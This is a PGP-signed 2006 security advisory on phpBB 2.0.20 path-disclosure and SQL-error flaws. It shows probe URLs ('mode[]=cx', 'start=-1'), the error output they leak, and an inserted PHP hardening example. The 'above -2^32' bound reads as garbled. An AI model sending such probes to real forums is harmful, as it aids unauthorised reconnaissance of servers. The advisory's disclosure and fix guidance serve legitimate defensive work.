-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1


[phpBB 2.0.20 Full Path Disclosure and SQL Errors]


Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- -Written: 1.5.2006

- -Public: 5.5.2006


from SecurityReason.Com

CVE:

- - CVE-2006-2219 Full Path Disclosure

- - CVE-2006-2220 Sql Errors


- --- 0.Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful PHP 
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC 
database servers, phpBB is the ideal free community solution for all web sites.

Contact the phpBB authors: http://www.phpbb.com/about.php.


- --- 1. Full Path Disclosure ---

Many scripts, phpBB among them, share a basic bug: request variables are passed 
straight into specific PHP functions without any check of their type. Take the 
function htmlspecialchars() as an example:


...

        if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {
                return;
        }

...


As you can see, zend_parse_parameters() enforces the type of the input variable 
("s" requires a string). If the variable is anything other than a string, PHP 
raises a warning, and that warning discloses the full path of the script 
(Full Path Disclosure).


Example:


http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx


- ---Code ---

if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
        $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
        $mode = 'joined';
}

- ---Code ---


- ---Result ---

Warning: htmlspecialchars() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/memberlist.php on line 40


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 483


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 485


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 486

- ---Result ---


http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx


- ---Result ---

Warning: htmlspecialchars() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/viewtopic.php on line 487


Warning: urlencode() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/viewtopic.php on line 498


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 483


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 485


Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/viewtopic.php:487) in 
/www/2020/phpBB2/includes/page_header.php on line 486

- ---Result ---


The problem only appears when display_errors is on (display_errors=1), but that 
is the case on many websites (even at php.net).


- --- 2. Sql Errors ---


The problem appears because whatever integer we supply is appended to the end of 
the SQL query, in the LIMIT clause. The query fails if the value is below 0 or 
above -2^32.


Example:


http://[HOST]/2020/phpBB2/memberlist.php?start=-1


- ---Code ---

$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;

- ---Code ---


- ---Result ---

Could not query users


DEBUG MODE


SQL Error : 1064 You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '-1, 
50' at line 4


SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, 
user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, 
user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER 
BY user_regdate ASC LIMIT -1, 50


Line : 151

File : memberlist.php

- ---Result ---


- --- 3. How to fix ---

Turn off display_errors, or check the type of the input with a function like 
is_string() before passing it on.
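The following is an added example, not phpBB's own code, showing how the two 
request parameters from sections 1 and 2 can be handled so that neither the 
htmlspecialchars() warning nor the negative LIMIT can occur. The list of allowed 
modes, the row limits and the function names are assumptions made for the 
example; phpBB's real values live in memberlist.php.

```php
<?php
// Added example (not phpBB's code): hardened handling of the `mode` and `start`
// request parameters discussed in the advisory, plus the display_errors setting.
declare(strict_types=1);

// 1. Full Path Disclosure: accept `mode` only if it is a string from a known list.
//    An array value (mode[]=cx) or any other non-string falls back to the default,
//    so htmlspecialchars() is never called on a non-string.
function read_mode(array $get, array $post, string $default = 'joined'): string
{
    // Hypothetical allow-list; phpBB's actual modes are defined in memberlist.php.
    static $allowed = ['joined', 'username', 'posts', 'email', 'website', 'topten'];

    $raw = $post['mode'] ?? $get['mode'] ?? null;
    if (!is_string($raw)) {
        return $default;
    }
    return in_array($raw, $allowed, true) ? $raw : $default;
}

// 2. SQL Errors: `start` must be a non-negative integer inside a sane window.
//    intval() alone lets -1 through and yields "LIMIT -1, 50".
function read_start(array $get, int $page_size = 50, int $max_rows = 1000000): int
{
    $raw = $get['start'] ?? 0;
    // FILTER_VALIDATE_INT rejects arrays and malformed numbers; min_range/max_range
    // enforce the bounds in the same step. Any rejection falls back to page 0.
    $start = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => $max_rows],
    ]);
    if ($start === false) {
        return 0;
    }
    // Align to a page boundary so the offset is always a multiple of the page size.
    return $start - ($start % $page_size);
}

// Build the LIMIT clause from validated integers only. A prepared statement with
// bound integer parameters is preferable; the sprintf() form is shown because
// phpBB 2 assembles its queries as strings.
function limit_clause(int $start, int $page_size): string
{
    return sprintf('LIMIT %d, %d', $start, $page_size);
}

// 3. display_errors: never echo PHP warnings to the client. Logging them keeps
//    the diagnostic for the administrator without leaking the script path.
function harden_error_display(): void
{
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');
    set_error_handler(static function (int $errno, string $errstr, string $errfile, int $errline): bool {
        error_log(sprintf('[php %d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
        return true; // handled: suppress PHP's default output
    });
}

// Constructed sample requests mirroring the advisory's URLs (not captured traffic).
$samples = [
    'mode[]=cx'         => ['get' => ['mode' => ['cx']],          'post' => []],
    'mode=username'     => ['get' => ['mode' => 'username'],      'post' => []],
    'start=-1'          => ['get' => ['start' => '-1'],           'post' => []],
    'start=137'         => ['get' => ['start' => '137'],          'post' => []],
    'start=99999999999' => ['get' => ['start' => '99999999999'],  'post' => []],
];

harden_error_display();
foreach ($samples as $label => $req) {
    $mode  = read_mode($req['get'], $req['post']);
    $start = read_start($req['get']);
    printf("%-20s mode=%-9s %s\n", $label, $mode, limit_clause($start, 50));
}
```

With these checks the array value for `mode` and the negative or oversized 
`start` both degrade to the defaults (`joined` and `LIMIT 0, 50`) instead of 
producing a warning or a failing query, and with display_errors off any warning 
that does slip through goes to the error log rather than to the response body.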


- --- 4. Greets ---

sp3x


Infospec, p_e_a, krasza, revival, l5x


- --- 5. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]

Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2.2 (FreeBSD)


iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5

7DlqP3M3vq1frb7Zc3y+KrU=

=4U6Y

-----END PGP SIGNATURE-----
